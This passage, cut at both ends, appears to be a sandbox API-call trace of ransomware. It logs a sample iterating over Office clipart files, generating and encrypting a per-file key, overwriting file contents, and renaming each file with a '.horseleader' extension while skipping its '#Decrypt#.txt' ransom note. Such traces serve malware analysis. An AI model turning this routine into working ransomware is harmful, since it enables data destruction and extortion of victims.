ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xb88, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD00448_.WMF", cAlternateFileName="")) returned 1 [0253.949] lstrcmpiW (lpString1="DD00448_.WMF", lpString2="Windows") returned -1 [0253.949] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program 
Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 67 [0253.949] StrStrIW (lpFirst="DD00448_.WMF", lpSrch=".horseleader") returned 0x0 [0253.949] lstrcmpW (lpString1="DD00448_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.950] lstrcmpW (lpString1="DD00448_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.950] lstrlenW (lpString=".testttjffg") returned 11 [0253.950] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.950] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.950] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.950] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00448_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.951] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 67 [0253.951] StrStrW (lpFirst="DD00448_.WMF", lpSrch=".txt") returned 0x0 [0253.951] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2952) returned 1 [0253.951] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xb88, lpOverlapped=0x0) returned 1 [0253.953] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff478, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.953] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xb88, 
lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xb88, lpOverlapped=0x0) returned 1 [0253.953] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.953] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.953] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.953] CloseHandle (hObject=0x158) returned 1 [0253.953] GetProcessHeap () returned 0x780000 [0253.953] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.953] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF.horseleader") returned 79 [0253.953] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00448_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00448_.wmf.horseleader")) returned 1 [0253.954] GetProcessHeap () returned 0x780000 [0253.954] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.954] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d5b650, 
ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2708, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD00449_.WMF", cAlternateFileName="")) returned 1 [0253.954] lstrcmpiW (lpString1="DD00449_.WMF", lpString2="Windows") returned -1 [0253.954] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 67 [0253.954] StrStrIW (lpFirst="DD00449_.WMF", lpSrch=".horseleader") returned 0x0 [0253.954] lstrcmpW (lpString1="DD00449_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.954] lstrcmpW (lpString1="DD00449_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.954] lstrlenW (lpString=".testttjffg") returned 11 [0253.954] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.954] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.954] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.955] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00449_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.955] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 67 [0253.955] StrStrW (lpFirst="DD00449_.WMF", lpSrch=".txt") returned 0x0 [0253.955] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=9992) returned 1 [0253.955] ReadFile (in: 
hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2708, lpOverlapped=0x0) returned 1 [0253.970] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd8f8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.971] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2708, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2708, lpOverlapped=0x0) returned 1 [0253.971] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.971] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.971] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.971] CloseHandle (hObject=0x158) returned 1 [0253.971] GetProcessHeap () returned 0x780000 [0253.971] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.971] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF.horseleader") returned 79 [0253.971] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00449_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF.horseleader" (normalized: "c:\\program files\\microsoft 
office\\clipart\\pub60cor\\dd00449_.wmf.horseleader")) returned 1 [0253.972] GetProcessHeap () returned 0x780000 [0253.972] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.973] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac04fe00, ftCreationTime.dwHighDateTime=0x1bf323f, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xac04fe00, ftLastWriteTime.dwHighDateTime=0x1bf323f, nFileSizeHigh=0x0, nFileSizeLow=0x5130, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD00687_.WMF", cAlternateFileName="")) returned 1 [0253.973] lstrcmpiW (lpString1="DD00687_.WMF", lpString2="Windows") returned -1 [0253.973] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 67 [0253.973] StrStrIW (lpFirst="DD00687_.WMF", lpSrch=".horseleader") returned 0x0 [0253.973] lstrcmpW (lpString1="DD00687_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.973] lstrcmpW (lpString1="DD00687_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.973] lstrlenW (lpString=".testttjffg") returned 11 [0253.973] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.973] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.973] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.973] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00687_.wmf"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.974] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 67 [0253.974] StrStrW (lpFirst="DD00687_.WMF", lpSrch=".txt") returned 0x0 [0253.974] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=20784) returned 1 [0253.974] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.977] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.977] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.978] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x130, lpOverlapped=0x0) returned 1 [0253.978] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffed0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.978] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x130, lpOverlapped=0x0) returned 1 [0253.978] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.978] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, 
lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.978] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.978] CloseHandle (hObject=0x158) returned 1 [0253.979] GetProcessHeap () returned 0x780000 [0253.979] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.979] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF.horseleader") returned 79 [0253.979] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00687_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00687_.wmf.horseleader")) returned 1 [0253.981] GetProcessHeap () returned 0x780000 [0253.981] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.981] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6bcb1e00, ftCreationTime.dwHighDateTime=0x1bd4b37, ftLastAccessTime.dwLowDateTime=0x51d5b650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6bcb1e00, ftLastWriteTime.dwHighDateTime=0x1bd4b37, nFileSizeHigh=0x0, nFileSizeLow=0x600c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD00705_.WMF", cAlternateFileName="")) returned 1 [0253.981] lstrcmpiW (lpString1="DD00705_.WMF", lpString2="Windows") returned -1 [0253.981] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 67 [0253.981] StrStrIW (lpFirst="DD00705_.WMF", lpSrch=".horseleader") returned 0x0 [0253.981] lstrcmpW (lpString1="DD00705_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.981] lstrcmpW (lpString1="DD00705_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.981] lstrlenW (lpString=".testttjffg") returned 11 [0253.981] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.981] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.981] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.982] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00705_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.982] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 67 [0253.982] StrStrW (lpFirst="DD00705_.WMF", lpSrch=".txt") returned 0x0 [0253.983] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=24588) returned 1 [0253.983] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.986] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.986] WriteFile (in: hFile=0x158, 
lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.986] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x100c, lpOverlapped=0x0) returned 1 [0253.987] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffeff4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.987] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x100c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x100c, lpOverlapped=0x0) returned 1 [0253.987] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.987] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.987] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.987] CloseHandle (hObject=0x158) returned 1 [0253.987] GetProcessHeap () returned 0x780000 [0253.988] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.988] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF.horseleader") returned 79 [0253.988] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF" (normalized: "c:\\program files\\microsoft 
office\\clipart\\pub60cor\\dd00705_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00705_.wmf.horseleader")) returned 1 [0253.989] GetProcessHeap () returned 0x780000 [0253.989] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.989] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb92d600, ftCreationTime.dwHighDateTime=0x1bd4b42, ftLastAccessTime.dwLowDateTime=0x51d5b650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdb92d600, ftLastWriteTime.dwHighDateTime=0x1bd4b42, nFileSizeHigh=0x0, nFileSizeLow=0x8b2, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01015_.WMF", cAlternateFileName="")) returned 1 [0253.989] lstrcmpiW (lpString1="DD01015_.WMF", lpString2="Windows") returned -1 [0253.989] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 67 [0253.989] StrStrIW (lpFirst="DD01015_.WMF", lpSrch=".horseleader") returned 0x0 [0253.989] lstrcmpW (lpString1="DD01015_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.989] lstrcmpW (lpString1="DD01015_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.989] lstrlenW (lpString=".testttjffg") returned 11 [0253.989] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.989] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.990] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.990] CreateFileW 
(lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01015_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.991] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 67 [0253.991] StrStrW (lpFirst="DD01015_.WMF", lpSrch=".txt") returned 0x0 [0253.991] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2226) returned 1 [0253.991] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x8b2, lpOverlapped=0x0) returned 1 [0253.993] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff74e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.993] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x8b2, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x8b2, lpOverlapped=0x0) returned 1 [0253.993] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.993] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.993] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.993] CloseHandle (hObject=0x158) returned 1 [0253.994] GetProcessHeap () returned 0x780000 [0253.994] 
RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.994] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF.horseleader") returned 79 [0253.994] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01015_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01015_.wmf.horseleader")) returned 1 [0253.995] GetProcessHeap () returned 0x780000 [0253.995] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.995] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x39e4, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01039_.WMF", cAlternateFileName="")) returned 1 [0253.995] lstrcmpiW (lpString1="DD01039_.WMF", lpString2="Windows") returned -1 [0253.995] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 67 [0253.995] StrStrIW (lpFirst="DD01039_.WMF", lpSrch=".horseleader") returned 0x0 [0253.995] lstrcmpW (lpString1="DD01039_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.995] lstrcmpW (lpString1="DD01039_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.995] lstrlenW (lpString=".testttjffg") returned 11 [0253.995] StrStrW (lpFirst="\\\\?\\C:\\Program 
